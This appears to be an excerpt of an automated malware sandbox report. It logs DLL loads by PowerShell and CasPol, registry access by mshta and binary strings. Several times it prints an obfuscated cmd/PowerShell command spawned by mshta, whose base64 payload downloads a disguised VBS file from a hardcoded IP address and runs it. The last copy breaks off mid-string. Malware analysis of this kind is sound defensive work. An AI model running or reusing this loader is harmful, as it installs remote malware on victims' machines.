                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                          Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.1784462151.0000000006E40000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: stem.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1511324447.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.1820180865.0000000007A8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1819229489.00000000075E0000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.1784462151.0000000006E40000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.1784462151.0000000006E40000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.1784462151.0000000006E40000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+b source: powershell.exe, 00000008.00000002.1784462151.0000000006E40000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1513173387.0000000008035000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.1820180865.0000000007A8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1819229489.00000000075E0000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.1784462151.0000000006E40000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: q8C:\Users\user\AppData\Local\Temp\eykjjr5p\eykjjr5p.pdb source: powershell.exe, 00000003.00000002.1506870890.0000000004D35000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: dnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsijikiddnlib.dotnet.emitiinstructionoperandresolverieigdnlib.utilslazylist`1iaibdnlib.dotnetpropertyattributesicdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamixiydnlib.dotnetclasssigizdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotjojndnlib.dotnet.pdbsymbolreadercreatorjmjldnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerjkjjdnlib.dotnet.mdimagecor20headerjidnlib.dotnet.mdirawrowjhdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulejzjyjxdnlib.dotnet.writerstrongnamesignaturednlib.dotne
                          Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.1820180865.0000000007A8A000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.1784462151.0000000006E40000.00000004.00000800.00020000.00000000.sdmp

                          Data Obfuscation

                          barindex
                          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
                          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"Jump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
                          Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm